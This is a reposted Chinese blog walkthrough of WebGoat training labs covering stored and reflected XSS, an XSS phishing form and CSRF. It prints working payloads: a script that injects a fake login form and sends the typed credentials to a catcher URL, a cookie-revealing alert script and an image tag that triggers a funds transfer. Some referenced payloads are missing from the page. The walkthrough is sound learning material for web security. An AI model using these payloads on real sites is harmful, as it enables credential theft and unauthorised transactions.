WebGoat系列實(shí)驗(yàn)Cross-Site Scripting (XSS)

PhishingTitle

本次實(shí)驗(yàn)是在一個(gè)已知存在XSS漏洞的頁面進(jìn)行釣魚攻擊。通過使用XSS與HTML注入，在頁面中注入身份認(rèn)證html代碼，添加javascript腳本收集身份認(rèn)證信息，并發(fā)送到http://localhost:8080/WebGoat/catcher?PROPERTY=yes...

輸入以下javascript代碼。（之前這個(gè)位置提交的javascript代碼沒有顯示出來，原來是因?yàn)樵创a被過濾掉了...）

</form><script>function hack(){image=new Image;image.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&username="+document.phish.username.value+"&password="+document.phish.password.value+"";alert("PHISHING!");}</script><form name = "phish"><br><HR><H3>This feature requires account login:</H3><br>Enter Username:<br><input type="text" name="username"><br>Enter Password:<br><input type="password" name="password"><br><input type="submit" name=login value="login" onclick=hack()></form><br><HR>

在偽造的輸入框中輸入用戶名與密碼，點(diǎn)擊login按鈕，用戶的登錄認(rèn)證信息就被發(fā)送到構(gòu)造的頁面中了。

LAB: Cross Site Scripting

Stage 1:Stored XSS

作為Tom，在個(gè)人簡介編輯頁執(zhí)行存儲型XSS攻擊，驗(yàn)證Jerry會(huì)受到攻擊影響。

使用Tom登錄，修改Tom的個(gè)人簡介編輯頁的街道一欄，在其后添加,更新個(gè)人信息。

使用Jerry登錄，選擇Tom的個(gè)人信息進(jìn)行查看，彈窗表明存儲型XSS攻擊成功。

Stage 2:Block Stored XSS using Input Validation

THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

Stage3:Stored XSS Revisited

驗(yàn)證Bruce的個(gè)人簡介中包含有XSS攻擊，使用David用戶登錄，查看Bruce的個(gè)人簡介，出現(xiàn)彈窗，表明存在XSS攻擊。

Stage4:Block Stored XSS using Output Encoding

THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

Stage5:Reflected XSS

利用查找職工頁面的缺陷制作一個(gè)包含有反射型XSS的URL，驗(yàn)證其他使用這個(gè)鏈接的用戶也會(huì)受到攻擊影響。

使用用戶Larry登錄，在Search Staff搜索框中輸入。

Stage6:Block Reflected XSS

THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT

Stored XSS Attacks

清除所有的輸入是一個(gè)很好的選擇，尤其是清除那些將被用作參數(shù)使用的輸入。對于在應(yīng)用程序中永久存儲的內(nèi)容特別重要。當(dāng)用戶的消息被檢索時(shí)，不能出現(xiàn)不期望的消息內(nèi)容。

在輸入的內(nèi)容中添加javascript代碼，點(diǎn)擊Submit按鈕。

點(diǎn)擊生成的文章鏈接，會(huì)顯示一個(gè)彈窗，表明頁面存在存儲型XSS。

Reflected XSS Attacks

在服務(wù)器端驗(yàn)證所有輸入是一個(gè)很好的選擇。未驗(yàn)證的用戶輸入可能會(huì)在HTTP響應(yīng)中出現(xiàn)XSS。攻擊者可以創(chuàng)建一個(gè)URL，通過讓受害者點(diǎn)擊的方式進(jìn)行XSS攻擊。

在digit access code框中添加

<script>alert(document.cookie);</script>

，點(diǎn)擊Purchase按鈕完成。

Cross Site Request Forgery (CSRF)

實(shí)驗(yàn)需要向新聞組發(fā)送一封email。在email中包含一張圖片，圖片的URL指向一個(gè)惡意請求。實(shí)驗(yàn)中，URL應(yīng)指向attack servlet，參數(shù)有Screen與menu，還有一個(gè)額外的參數(shù)transferFunds帶有任意數(shù)值。收件人剛好進(jìn)行身份認(rèn)證，正在轉(zhuǎn)移資金。

構(gòu)造一封郵件，在Message后添加一張圖片，根據(jù)Screen與menu值構(gòu)造URL，圖片的javascript代碼為

<img src="attack?Screen=2078372&menu=900&transferFunds=5000"/>

。

當(dāng)收件人打開這封email時(shí)，由于自身身份已經(jīng)認(rèn)證，因此賬戶被轉(zhuǎn)移了5000。

CSRF Prompt By-Pass

實(shí)驗(yàn)需要向新聞組發(fā)送email包含以下惡意請求，首先轉(zhuǎn)賬，然后請求提示確認(rèn)。

在email的正文中輸入如下javascript代碼。

CSRF Token By-Pass

轉(zhuǎn)載于:https://www.cnblogs.com/yangmzh3/p/7542018.html

總結(jié)

以上是生活随笔為你收集整理的WebGoat系列实验Cross-Site Scripting (XSS)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。